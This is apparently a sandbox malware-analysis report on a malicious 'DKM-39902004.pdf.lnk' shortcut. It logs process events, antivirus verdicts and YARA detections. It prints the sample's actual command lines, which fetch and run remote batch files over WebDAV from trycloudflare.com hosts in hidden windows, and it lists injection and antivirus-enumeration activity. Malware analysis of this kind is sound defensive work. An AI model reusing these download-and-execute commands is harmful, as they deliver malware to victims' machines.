cmdline	C:\Windows\System32\cmd.exe /k "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat" hidden
cmdline	"C:\Windows\System32\cmd.exe" /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat
cmdline	"C:\Windows\System32\cmd.exe" /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat
cmdline	"C:\Windows\system32\cmd.exe" /k "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat" hidden
cmdline	powershell -Command "Expand-Archive -Path 'C:\Users\test22\Contacts\zone.zip' -DestinationPath 'C:\Users\test22\Contacts' -Force"
cmdline	C:\Windows\system32\cmd.exe /c powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct \| Select-Object -ExpandProperty displayName" 2>nul
cmdline	powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat\" hidden' -WindowStyle Hidden"
cmdline	C:\Windows\system32\cmd.exe /c powershell -Command "[System.Net.Dns]::GetHostName()"
cmdline	C:\Windows\system32\cmd.exe /K \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat
cmdline	"C:\Windows\system32\cmd.exe" /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat" hidden
cmdline	powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct \| Select-Object -ExpandProperty displayName"
cmdline	C:\Windows\System32\cmd.exe /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat" hidden
cmdline	C:\Windows\system32\cmd.exe /K \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat

A process created a hidden window (9 events)

Time & API	Arguments	Status	Return
ShellExecuteExW April 16, 2025, 11:06 a.m.	show_type: 0 filepath_r: cmd parameters: /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat filepath: cmd	1	1
ShellExecuteExW April 16, 2025, 11:06 a.m.	show_type: 0 filepath_r: cmd parameters: /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat filepath: cmd	1	1
ShellExecuteExW April 16, 2025, 11:06 a.m.	show_type: 0 filepath_r: cmd parameters: /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat filepath: cmd	1	1
CreateProcessInternalW April 16, 2025, 11:06 a.m.	thread_identifier: 940 thread_handle: 0x00000084 process_identifier: 1152 current_directory: C:\Windows filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat\" hidden' -WindowStyle Hidden" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000008c	1	1
ShellExecuteExW April 16, 2025, 11:06 a.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat" hidden filepath: C:\Windows\System32\cmd.exe	1	1
CreateProcessInternalW April 16, 2025, 11:06 a.m.	thread_identifier: 2412 thread_handle: 0x00000088 process_identifier: 2364 current_directory: C:\Windows filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/k \"\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat\" hidden' -WindowStyle Hidden" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
ShellExecuteExW April 16, 2025, 11:06 a.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: /k "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat" hidden filepath: C:\Windows\System32\cmd.exe	1	1
CreateProcessInternalW April 16, 2025, 11:06 a.m.	thread_identifier: 2996 thread_handle: 0x00000088 process_identifier: 2452 current_directory: C:\Windows filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat\" hidden' -WindowStyle Hidden" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
ShellExecuteExW April 16, 2025, 11:06 a.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat" hidden filepath: C:\Windows\System32\cmd.exe	1	1

File has been identified by 3 AntiVirus engines on VirusTotal as malicious (3 events)

ESET-NOD32	a variant of Generik.LKBOMJW
Kaspersky	HEUR:Trojan-Downloader.WinLNK.Agent.gen
huorong	TrojanDownloader/LNK.Agent.en

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 16, 2025, 11:06 a.m.	process_identifier: 676 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8192 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x02950000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses April 16, 2025, 11:05 a.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (7 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW April 16, 2025, 11:06 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 16, 2025, 11:06 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 16, 2025, 11:06 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 16, 2025, 11:06 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 16, 2025, 11:06 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 16, 2025, 11:06 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 16, 2025, 11:06 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (50 out of 109 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS

Uses Windows utilities for basic Windows functionality (5 events)

cmdline	net use W: "\\characters-contrary-foster-workout.trycloudflare.com@SSL\DavWWWRoot"
cmdline	net use U: /delete /yes
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2356 CREDAT:145409
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline	net use U: "\\divide-snow-pound-clip.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no

Creates an Alternate Data Stream (ADS) (1 event)

file	C:\Windows\%oI¼╢e:~27,1%oI¼╢e:~61,1%oI¼╢e:~29,1oI¼╢e:~0,1%oI¼╢e:~10,1%oI¼╢e:~27,1%oI¼╢e:~21,1%

A potential heapspray has been detected. 64 megabytes was sprayed onto the heap of the powershell.exe process (1 event)

count

1039

name

heapspray

process

powershell.exe

total_mb

length

65536

protection

PAGE_READWRITE

One or more non-whitelisted processes were created (12 events)

parent_process	powershell.exe	martian_process	C:\Windows\System32\cmd.exe /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat" hidden
parent_process	powershell.exe	martian_process	"C:\Windows\system32\cmd.exe" /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat" hidden
parent_process	powershell.exe	martian_process	"C:\Windows\system32\cmd.exe" /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat" hidden
parent_process	powershell.exe	martian_process	C:\Windows\System32\cmd.exe /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat" hidden
parent_process	powershell.exe	martian_process	"C:\Windows\system32\cmd.exe" /k "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat" hidden
parent_process	powershell.exe	martian_process	C:\Windows\System32\cmd.exe /k "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat" hidden
parent_process	wscript.exe	martian_process	cmd /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat
parent_process	wscript.exe	martian_process	cmd /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat
parent_process	wscript.exe	martian_process	cmd /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat

Resumed a suspended thread in a remote process potentially indicative of process injection (10 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2548 resumed a thread in remote process 2800
Process injection	Process 2908 resumed a thread in remote process 2992
Process injection	Process 2104 resumed a thread in remote process 2180
Process injection	Process 2356 resumed a thread in remote process 676
Process injection	Process 2196 resumed a thread in remote process 2516
NtResumeThread April 16, 2025, 11:06 a.m.	thread_handle: 0x00000654 suspend_count: 1 process_identifier: 2800	1	0	0
NtResumeThread April 16, 2025, 11:06 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2992	1	0	0
NtResumeThread April 16, 2025, 11:06 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2180	1	0	0
NtResumeThread April 16, 2025, 11:06 a.m.	thread_handle: 0x00000338 suspend_count: 1 process_identifier: 676	1	0	0
NtResumeThread April 16, 2025, 11:06 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2516	1	0	0

Creates a suspicious Powershell process (3 events)

option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (22 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\cmd.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

DKM-39902004.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All